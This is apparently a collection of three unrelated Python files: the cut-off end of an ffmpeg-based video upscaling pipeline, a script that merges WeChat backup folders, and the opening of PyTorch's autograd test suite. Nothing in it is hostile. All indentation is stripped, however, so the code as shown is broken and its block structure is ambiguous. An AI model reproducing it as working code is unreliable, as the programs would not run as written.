commandVideo[-1] = suffix(outputPath, '-v')
commandOut = [
ffmpegPath,
'-hide_banner', '-y',
'-i', commandVideo[-1],
'-i', dataPath,
'-map', '0:v',
'-map', '1?',
'-c:0', 'copy',
'-c:1', 'copy',
*metadata,
outputPath
]
else:
commandVideo[16] = video
frameRate = optEncode.get('frameRate', 0)
width = optDecode.get('width', 0)
height = optDecode.get('height', 0)
sizes = [step for step in procSteps if step['op'] in resizeOp]
return outputPath, process, start, stop, ahead, root, commandIn, commandVideo, commandOut, slomos, sizes, width, height, frameRate
def setupInfo(by, outputPath, root, commandIn, commandVideo, commandOut, slomos, sizes, start, width, height, frameRate, totalFrames, videoOnly):
if root.total < 0 and totalFrames > 0:
root.total = totalFrames - start
if frameRate:
for opt in slomos:
frameRate *= opt['sf']
outWidth, outHeight = (width, height)
for opt in sizes:
if opt['op'] == 'SR':
outWidth *= opt['scale']
outHeight *= opt['scale']
elif opt['op'] == 'VSR':
outWidth *= 4
outHeight *= 4
else: # resize
outWidth = round(outWidth * opt['scaleW']) if 'scaleW' in opt else opt['width']
outHeight = round(outHeight * opt['scaleH']) if 'scaleH' in opt else opt['height']
commandVideo[8] = f'{outWidth}x{outHeight}'
commandVideo[10] = str(frameRate)
videoOnly |= start > 0
if videoOnly or by:
commandVideo = commandVideoSkip(commandVideo)
if videoOnly or not by:
commandVideo[-1] = outputPath
i = commandIn.index('-vn')
commandIn = clipList(commandIn, i, i + 5)
commandOut = None
root.multipleLoad(width * height * 3)
initialETA(root)
root.reset().trace(0)
return commandIn, commandVideo, commandOut
def cleanAV(command, path):
if command:
try:
stat = os.stat(path)
except Exception:
stat = False
removeFile(command[6])
video = command[4]
if stat:
removeFile(video)
else:
return video
return path
def mergeAV(command):
if command:
err = True
procMerge = popenText(command)
createEnqueueThread(procMerge.stderr)
err, msg = procMerge.communicate()
sys.stdout.write(msg)
return procMerge, err
else:
return 0, 0
def SR_vid(video, by, *steps):
def p(raw_image=None):
bufs = process((raw_image, height, width))
if (not bufs is None) and len(bufs):
for buffer in bufs:
if buffer:
procOut.stdin.write(buffer)
if raw_image:
root.trace()
return 0 if bufs is None else len(bufs)
context.stopFlag.clear()
outputPath, process, *args = prepare(video, by, steps)
start, stop, refs, root = args[:4]
width, height, *more = getVideoInfo(video, by, *args[-3:])
root.callback(root, dict(shape=[height, width], fps=more[0]))
commandIn, commandVideo, commandOut = setupInfo(by, outputPath, *args[3:9], start, width, height, *more)
procIn = popen(commandIn)
procOut = sp.Popen(commandVideo, stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE, bufsize=0)
procMerge = 0
err = 0
try:
createEnqueueThread(procOut.stdout)
createEnqueueThread(procIn.stderr)
createEnqueueThread(procOut.stderr)
i = 0
frameBytes = width * height * pixBytes # read 1 frame
while (stop < 0 or i <= stop + refs) and not context.stopFlag.is_set():
raw_image = procIn.stdout.read(frameBytes)
if len(raw_image) == 0:
break
readSubprocess(qOut)
if i >= start:
p(raw_image)
elif (i + 1) % 10 == 0:
root.callback(root, dict(skip=i + 1))
i += 1
idle()
os.kill(procIn.pid, sigint)
if len(raw_image) == 0: # tell VSR to pad frames
arefs = 0 if stop <= 0 or i < stop else i - stop
for step in steps:
if arefs >= refs:
break
if step['op'] == 'slomo':
refs = refs * step['sf'] + step['opt'].outEnd # outEnd is negative
step['opt'].outEnd = 0
arefs = arefs * step['sf']
elif step['op'] in padOp:
step['opt'].end = -min(refs - arefs, lookahead[step['op']])
refs += step['opt'].end
p()
procOut.communicate(timeout=300)
procIn.terminate()
readSubprocess(qOut)
procMerge, err = mergeAV(commandOut)
finally:
log.info('Video processing end at frame #{}.'.format(i - refs))
procIn.terminate()
procOut.terminate()
if procMerge:
procMerge.terminate()
clean()
try:
if not by:
removeFile(video)
except Exception:
log.warning('Timed out waiting ffmpeg to terminate, need to remove {} manually.'.format(video))
if err:
log.warning('Unable to merge video and other tracks with exit code {}.'.format(err))
else:
outputPath = cleanAV(commandOut, outputPath)
readSubprocess(qOut)
return outputPath, i - refs
|
merge_wechat_backup.py
|
#!/usr/bin/python -u
"""
Copyright 2017, Jacksgong(https://blog.dreamtobe.cn)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Script to merge and migrate wechat backup on mac.
# Some case like you can merge and migrate wechat backup files to the Dropbox auto-backup folder to make it on cloud.
import sys
import time
import filecmp
import re
from os import walk, makedirs, remove, environ
from os.path import join, exists, getsize
from shutil import copyfile
from threading import Thread
#from wechat_backup_utils import colorize, YELLOW, RED, GREEN, BLACK, handle_home_case, select_conf_file, show_spinner
from wechat_backup_utils import handle_home_case, select_conf_file, show_spinner
__version__ = '1.0.0'
def replace_file(src_path, dst_path, name):
# print ('replace the file: ' + name, fg=YELLOW)
print ('replace the file: ' + name)
remove(dst_path)
copyfile(src_path, dst_path)
def merge():
if not exists(dst_file_path):
if not exists(dst_subdir):
makedirs(dst_subdir)
copyfile(src_file_path, dst_file_path)
# print('copy the new file: ' + file_name, fg=RED)
print('copy the new file: ' + file_name)
else:
# compare the file size
src_file_size = getsize(src_file_path)
dst_file_size = getsize(dst_file_path)
if src_file_size != dst_file_size:
replace_file(src_file_path, dst_file_path, file_name)
else:
# compare the file
if not filecmp.cmp(src_file_path, dst_file_path):
replace_file(src_file_path, dst_file_path, file_name)
else:
print('no need to replace ' + file_name)
#print('no need to replace ' + file_name, fg=GREEN)
src, dst, conf_path = select_conf_file()
if src is None or dst is None:
exit("we can't find source directory or target directory on " + conf_path)
RELATE_DIR = re.compile(r'' + src + '/(.*)')
for src_subdir, dirs, files in walk(src):
for file_name in files:
if file_name == '.DS_Store':
continue
if src_subdir == src:
continue
relate_dir = RELATE_DIR.match(src_subdir).groups()[0]
dst_subdir = dst + '/' + relate_dir
src_file_path = join(src_subdir, file_name)
dst_file_path = join(dst_subdir, file_name)
print('compare ' + file_name + ' on ' + relate_dir)
thread = Thread(target=merge)
thread.start()
show_spinner(thread)
print('everything is done!')
|
test_autograd.py
|
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
x = torch.ones(1, requires_grad=True)
y = torch.ones(1, requires_grad=True)
# Make sure x and y have grad accumulators allocated
z = x * 2
w = y * 2
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_y)
# This is slightly different than the case above, because z doesn't even
# have a grad accumulator allocated.
z = torch.ones(1, requires_grad=True)
grad_x, grad_z = torch.autograd.grad(x * 2, [x, z], allow_unused=True)
self.assertEqual(grad_x, x * 2)
self.assertIsNone(grad_z)
# allow_unused=False, but grads contains None inside, should throw
with self.assertRaisesRegex(RuntimeError,
"Set allow_unused=True"):
grad_x, grad_y = torch.autograd.grad(x * 2, [x, y], allow_unused=False)
def test_grad_unreachable_discovery(self):
# Test that certain nodes are not erroneously executed when an input
# is unreachable. See #39784
class MyFunc(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
self.fail("This node should not be executed!")
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
(gY,) = torch.autograd.grad(x, (y, ), allow_unused=True)
self.assertIsNone(gY)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
z = torch.randn(1, requires_grad=True)
(gY, gZ) = torch.autograd.grad(x + z, (y, z), allow_unused=True)
self.assertIsNone(gY)
self.assertIsNotNone(gZ)
x = MyFunc.apply(torch.randn(1, requires_grad=True) * 2)
y = torch.randn(1, requires_grad=True)
torch.autograd.backward(x, inputs=(y, )) # allow_unused is implicitly True!
self.assertIsNone(y.grad)
def test_hooks(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
y.requires_grad_(True)
counter = [0]
def bw_hook(inc, grad):
self.assertIsInstance(grad, torch.Tensor)
counter[0] += inc
z = x ** 2 + x * 2 + x * y + y
x.register_hook(lambda *args: bw_hook(0, *args))
test = z.register_hook(lambda *args: bw_hook(1, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 1)
test2 = z.register_hook(lambda *args: bw_hook(2, *args))
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 4)
test2.remove()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(counter[0], 5)
def bw_hook_modify(grad):
return grad.mul(2)
test.remove()
z.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(y.grad, (x + 1) * 2)
y.register_hook(bw_hook_modify)
with torch.no_grad():
y.grad.zero_()
z.backward(torch.ones(5, 5))
self.assertEqual(y.grad, (x + 1) * 4)
def test_hooks_cpp(self):
# Tests hooks for autograd function implemented in C++
bn = torch.nn.BatchNorm1d(5, affine=False)
bn.double()
bn.eval()
counter = [0]
def bw_hook(grad):
counter[0] += 1
return grad * 2
x = torch.ones(5, 5, dtype=torch.double, requires_grad=True)
z = bn(x)
z.register_hook(bw_hook)
z.sum().backward()
self.assertEqual(counter[0], 1, msg='bw_hook not called')
self.assertEqual(x.grad, torch.ones(5, 5, dtype=torch.double) * 2, atol=1e-5, rtol=0)
def test_hook_none(self):
# WARNING: this is a test for autograd internals.
# You should never have to use such things in your code.
class NoneGradientFunction(Function):
@staticmethod
def forward(ctx, x, y):
assert ctx.needs_input_grad[0]
assert not ctx.needs_input_grad[1]
return x, y
@staticmethod
def backward(ctx, grad_x, grad_y):
return grad_x, None
was_called = [False]
def hook(grad):
self.assertIsNotNone(grad)
was_called[0] = True
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5)
rx, ry = NoneGradientFunction.apply(x, y)
rx.register_hook(hook)
ry.register_hook(hook)
sum(rx, ry).sum().backward()
self.assertTrue(was_called[0])
def test_retain_grad(self):
input = torch.rand(1, 3, requires_grad=True)
h1 = input * 3
out = (h1 * h1).sum()
# It should be possible to call retain_grad() multiple times
h1.retain_grad()
h1.retain_grad()
# Gradient should be accumulated
out.backward(retain_graph=True)
self.assertEqual(h1 * 2, h1.grad)
out.backward(retain_graph=True)
self.assertEqual(h1 * 4, h1.grad)
with torch.no_grad():
input.grad.zero_()
# It should be a no-op for leaves
input.retain_grad()
input.retain_grad()
out.backward()
self.assertEqual(input * 18, input.grad)
def test_retain_grad_cycle(self):
x = torch.ones(5, 5, requires_grad=True)
def run_test():
y = x * 2
y.retain_grad()
return y / 2, torch._C._WeakTensorRef(y)
z, ref = run_test()
self.assertTrue(ref.expired())
z.sum().backward()
def test_backward(self):
v = torch.randn(5, 5, requires_grad=True)
x = torch.randn(5, 5, requires_grad=True)
y = (torch.rand(5, 5) + 0.1).requires_grad_(True)
z = torch.randn(5, 5, requires_grad=True)
grad_output = torch.randn(5, 5)
v.backward(grad_output)
self.assertEqual(v.grad, grad_output)
a = x + (y * z) + 4 * z ** 2 * x / y
a.backward(grad_output)
x_grad = 4 * z.pow(2) / y + 1
y_grad = z - 4 * x * z.pow(2) / y.pow(2)
z_grad = 8 * x * z / y + y
self.assertEqual(x.grad, x_grad * grad_output)
self.assertEqual(y.grad, y_grad * grad_output)
self.assertEqual(z.grad, z_grad * grad_output)
def test_sparse_mm_backward(self):
size = (3, 3)
sparse = torch.sparse_coo_tensor(size, requires_grad=True)
